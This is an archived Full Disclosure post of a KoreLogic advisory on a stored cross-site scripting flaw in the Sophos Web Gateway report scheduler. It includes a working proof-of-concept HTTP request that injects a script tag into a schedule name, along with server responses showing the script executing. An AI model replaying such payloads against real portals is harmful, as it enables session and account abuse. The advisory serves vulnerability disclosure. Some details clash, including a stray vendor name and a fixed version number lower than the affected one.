[<prev] [next>] [day] [month] [year] [list]
Message-ID: <6c1de287-7733-925e-efee-9eb3807da304@korelogic.com>
Date: Fri, 26 Jan 2018 14:08:36 -0600
From: KoreLogic Disclosures <disclosures@...elogic.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site
Scripting Vulnerability
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt
1. Vulnerability Details
Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web
Page Generation, CWE-80: Improper Neutralization of
Script-Related HTML Tags in a Web Page
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The report scheduler menu within the management portal
contains a persistent cross site scripting vulnerability. This
vulnerability can be used to target other users of the same
portal.
3. Technical Description
A valid session is required to create the report with the
persistent cross site scripting payload attached. An example
attack payload has been included below. This payload is designed
to trigger an alert box with the number one being displayed.
POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close
action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d
HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41
{"status":0,"statusMsg":"Settings saved"}
The URL-encoded input being passed in input parameter can be
decoded to a array containing a single JSON buffer.
[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@...t.asdasd",
"schedule_id": "dGVzdA==", "owner": "admin"}]
Within the JSON buffer is a key called txt_schedule_name. The
value for this key is the name of the scheduled report. This
value is included in the report schedule list.
"txt_schedule_name": "test<script>alert(1);</script>"
The HTML tags are then stored. When the report schedule is
viewed, the resulting JSON is sent as content-type text/html
instead of application/json, causing the browser to execute any
unescaped javascript it contains. The output is HTML-encoded
with the exception of the txt_schedule_name: value which is
not sanitized, and the payload triggers.
POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close
action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd
HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1365
{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@...t.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"
title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"}
4. Mitigation and Remediation Recommendation
The vendor has released version 4.3.3.1 of the Web Gateway
which addesses this issue. Release notes available at:
http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2017.08.17 - KoreLogic submits vulnerability details to Sophos.
2017.08.17 - Sophos confirms receipt.
2017.09.29 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.10.17 - KoreLogic requests an update from Sophos.
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in
the next maintenance release, scheduled for the end of
November. Sophos asks KoreLogic to hold disclosure until
the new version is released.
2017.10.23 - 45 business days have elapsed since the vulnerability
was reported to Splunk.
2017.11.02 - Sophos notifies KoreLogic that the maintenance release
has gone live.
2018.01.26 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
Download attachment "signature.asc" of type "application/pgp-signature" (526 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists